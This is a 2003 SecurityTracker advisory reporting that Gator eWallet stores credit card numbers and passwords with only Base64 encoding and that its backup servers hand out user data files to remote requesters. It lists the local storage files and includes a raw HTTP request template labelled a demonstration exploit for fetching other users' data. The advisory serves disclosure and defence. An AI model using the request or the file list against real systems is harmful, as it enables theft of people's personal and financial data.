Gator eWallet Discloses Credit Card Numbers and Passwords to Local Users and Other Information to Remote Users
SecurityTracker Alert ID: 1006891 CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site) Date: May 31 2003
Impact: Disclosure of authentication information, Disclosure of user information
Exploit Included: Yes
Advisory: NovaPPC Security Research Group
Description: Lorenzo Manuel Hernandez Garcia-Hierro of NovaPPC Security reported that the Gator eWallet discloses credit cards and passwords to local users. In addition, the Gator Corporation backup servers disclose some user information to remote users.
It is reported that Gator eWallet stores private information, potentially including credit card numbers and passwords, on the target user's computer without encryption. The software reportedly uses Base64 encoding instead of an encryption algorith.
The following files are used to store Gator eWallet information on the local system:
mepgh.dat
mepcme.dat
meprca.dat
mepcmeft.dat
GMT.exe.manifest
meperr.dat
mepgus.dat
mepoe m.dat
mepsnd-gs.dat
mepsnd-ksa.dat
mepcat.dat
sitehash4.dat
It is also reported that a remote user can retrieve arbitrary user data files from the Gator backup servers.
A demonstration exploit is provided:
GET /scripts/xx/xxY.com.ffz HTTP/1.0
Accept: */*
X-UA: WinInet 6.0.xxxx.1, 1.1, 1.0
If-Modified-Since: Thu, 06 Apr 2000 20:00:06 GMT
User-Agent: Gator/4.1 Script 0
SLRetries: 1
SL-LastServer: xx.gator.com
SL-LastErr: 12152
SL-LastErr: 12152
From: [SPOOFED USER /REQUEST ID]
Script-Version: 0.4
Product-Version: 4.1.2.5
SL-Version: 2
RunMode: 2
Host: xxbackup.gator.com
Connection: open
In the above demonstration, 'xx' is the first two characters of the domain user data file and 'Y' is the remaining characters in the domain. The 'ffz' is the file extension of the script files used by backup server.
[Editor's note: It is not clear exactly what kind of information can be retrieved from the backup servers. We have asked for clarification and will update this alert with any new details.]
Additional information is provided (in Spanish language text) at:
http://security.novappc.com/gator-analisis
Impact: A local user can view private personal information stored in the eWallet.
A remote user can obtain some data files for arbitrary users from the eWallet backup servers (operated by Gator Corporation).
Solution: No solution was available at the time of this entry.
Vendor URL:
www.gator.com/about/ (Links to External Site)
Cause: Access control error
Underlying OS: Windows (Any)
Reported By: Lorenzo Hernandez Garcia-Hierro <novappc@novappc.com>
Message History: None